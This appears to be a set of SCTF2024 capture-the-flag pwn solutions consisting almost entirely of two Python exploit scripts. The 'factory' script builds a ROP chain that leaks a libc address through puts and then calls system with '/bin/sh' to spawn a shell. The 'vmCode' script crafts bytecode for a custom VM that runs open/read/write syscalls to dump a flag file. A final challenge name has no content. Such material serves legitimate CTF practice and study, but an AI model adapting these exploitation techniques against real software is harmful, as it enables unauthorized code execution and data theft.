SCTF2024

factory

#!/usr/bin/env python3
from pwncli import *
from ctypes import *
from time import time
from struct import pack
cli_script() # 使用脚本模式必须显式调用这个函数

# 你能够从gift里面取到很多东西
io   = gift['io'] # process或remote对象
elf  = gift["elf"] # ELF对象，ELF("./pwn")
libc = gift.libc # ELF对象， ELF("./libc.so.6")
filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

arch='amd64'
context(log_level = 'debug',os='linux',arch=arch)
if gift.remote:
    libc = ELF("./libc.so.6")
    gift['libc'] = libc
    # 有时候远程提供的libc与本地不一样，打靶机时替换libc为远程libc
    pass
libc_box = LibcBox() # LibcBox对象

r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #
pop_rdi = 0x0000000000401563
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
ret = 0x000000000040101a
# - - - - - - - - - - - - - #
def ss(c):
    ru("factory")
    sla("=",str(c))
# - - - - - - - - - - - - - #
def pwn_exp():
    print('PWN')
    sla("How many factorys do you want to build: ",str(40))
    for i in range(22):
        ss(0x33333333)
    ss(28)
    ss(pop_rdi)
    ss(puts_got)
    ss(puts_plt)
    ss(0x401303)
    ss(0x33333333)
    ss(0x33333333)
    ss(0x33333333)
    ss(0x33333333)
    ss(0x33333333)
    ss(0x33333333)
    ss(0x33333333)
    ru('\x0a')
    puts_Addr = u64_ex(io.recv(6))
    libc.address = puts_Addr - libc.symbols['puts']
    CG.set_find_area(find_in_libc=True,find_in_elf=False)
    for i in range(22):
        ss(0x33333333)
    ss(28)
    ss(ret)
    ss(pop_rdi)
    ss(CG.bin_sh())
    ss(libc.symbols['system'])
    ss(0x33333333)
    ss(0x33333333)
    ss(0x33333333)
    ss(0x33333333)
    ss(0x33333333)
    ss(0x33333333)
    ss(0x33333333)

# b * 0x4013FD

#log
    #libc=LibcSearcher("gets",gets_Addr);
    log.info('#---#---#---#---#')
    log.success('libc.address:'+hex(libc.address))
    #log.success('heap_bae:'+hex(heap_base))

if __name__ == '__main__':
    pwn_exp()
    io.interactive()

vmCode

#!/usr/bin/env python3
from pwncli import *
from ctypes import *
from time import time
from struct import pack
cli_script() # 使用脚本模式必须显式调用这个函数

# 你能够从gift里面取到很多东西
io   = gift['io'] # process或remote对象
elf  = gift["elf"] # ELF对象，ELF("./pwn")
libc = gift.libc # ELF对象， ELF("./libc.so.6")
filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

arch='amd64'
context(log_level = 'debug',os='linux',arch=arch)
if gift.remote:
    #libc = ELF("./libc.so.6")
    gift['libc'] = libc
    # 有时候远程提供的libc与本地不一样，打靶机时替换libc为远程libc
    pass
libc_box = LibcBox() # LibcBox对象

r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #
#返回地址为控制rax为与0x123a的偏移
#code_=[code+rsi] #rsi_base = 0x41
#ret_addr=[0x2020+(code_-0x21)*2]+0x123a
#rdi 为 stack偏移 rdi_base = 1
opt = b''
# - - - - - - - - - - - - - #
def sub_1274():
    global opt
def sub_1299():
    global opt
    opt += b'\x22'
    #rdi--
    #rsi=stack[rdi]
def sub_12a7():
    global opt
    opt += b'\x23'
    #stack[rdi-2]^=stack[rdi-1]
    #rdi--
def sub_12c4():
    global opt
    opt += b'\x24'
    #tmp = stack[rdi-1]
    #stack[rdi-1] = stack[rdi-3]
    #stack[rdi-3] = tmp
def sub_12e0():
    global opt
    opt += b'\x25'
    #tmp=stack[rdi-1]
    #stack[rdi-1]=stack[rdi-2]
    #stack[rdi-2]=tmp
def sub_12fc():
    global opt
    opt += b'\x26'
    #stack[rdi]=code[rsi]
    #rsi+=4
    #rdi++
def sub_1319():
    global opt
    opt += b'\x27'
    #stack[rdi-1]&=0xff
def sub_132e():
    global opt
    opt += b'\x28'
    #rdi--
def sub_1332():
    global opt
    opt += b'\x29'
    #stack[rdi-1]>>8
def sub_1348():
    global opt
    opt += b'\x2a'
    #stack[rdi]=stack[rdi-1]
    #rdi++
def sub_135c():
    global opt
    opt += b'\x2b'
    #stack[rdi-1]<<8
def sub_1372():
    global opt
    opt += b'\x2c'
    # rdi==0 --> rsi+=2; ret
    # rdi!=0 --> ax=code[rsi] ; rsi+=2; rsi = (rsi+ax)&0xff  ; ret
def sub_13a3():
    global opt
    opt += b'\x2d'
    # stack[rdi-2] >> (stack[rdi-1]&0xff)
    # rdi--
def sub_13c0():
    global opt
    opt += b'\x2e'
    # stack[rdi-2] << (stack[rdi-1]&0xff)
    # rdi--
def sub_13dd():
    global opt
    opt += b'\x2f'
    # stack[rdi-2] &= stack[rdi-1]
    # rdi--
def sub_13fa():
    global opt
    opt += b'\x30'
    # rax = stack[rdi-1]
    # rdi_ = stack[rdi-2]
    # rsi_ = stack[rdi-3]
    # rdx = stack[rdi-4]
    # syscall
    # rdi -= 3
    # stack[rdi-1] = rax
def sub_1425():
    global opt
    opt += b'\x31'
    # stack[rdi] = stack[rdi-1]
    # rdi++
def sub_1439():
    global opt
    opt += b'\x32'
    # stack[rdi] = code+rsi
    # rdi++
def exit():
    global opt
    opt += b'\x33'
#
#stack = 0x4460
#code = 0x4040
#rsi = 0x41
#rdi = 1
# - - - - - - - - - - - - - #
def pwn_exp():
    global opt
    print('PWN')
    opt+=b'\x26\x00\x02\x00\x00\x32\x26\x47\x00\x00\x00\x23\x26\x00\x00\x00\x00\x26\x00\x00\x00\x00\x30'
    #23 read(0,code+0x41+0x39,0x200)    7
    opt += b'\x26\x00\x00\x00\x00\x26\x00\x00\x00\x00\x32\x26\x63\x01\x00\x00\x23\x26\x02\x00\x00\x00\x30'
    #23 open(/flag) 7
    opt += b'\x26\x30\x00\x00\x00\x32\x26\xb5\x03\x00\x00\x23\x26\x03\x00\x00\x00\x26\x00\x00\x00\x00\x30'
    # read(3,code+0x300,0x30)   7
    opt += b'\x26\x30\x00\x00\x00\x32\x26\xcc\x03\x00\x00\x23\x26\x01\x00\x00\x00\x26\x01\x00\x00\x00\x30'
    # write(1,code+0x300,0x30)  7
    opt = opt.ljust(0x100+0x3f,b'A')+b'flag\x00\x00\x00'
    sa("shellcode:",opt[:0x3f])
    sl(opt[0x3f:])

#log
    #libc=LibcSearcher("gets",gets_Addr);
    log.info('#---#---#---#---#')
    log.success('libc.address:'+hex(libc.address))
    #log.success('heap_bae:'+hex(heap_base))

if __name__ == '__main__':
    pwn_exp()
    io.interactive()

kno_puts_revenge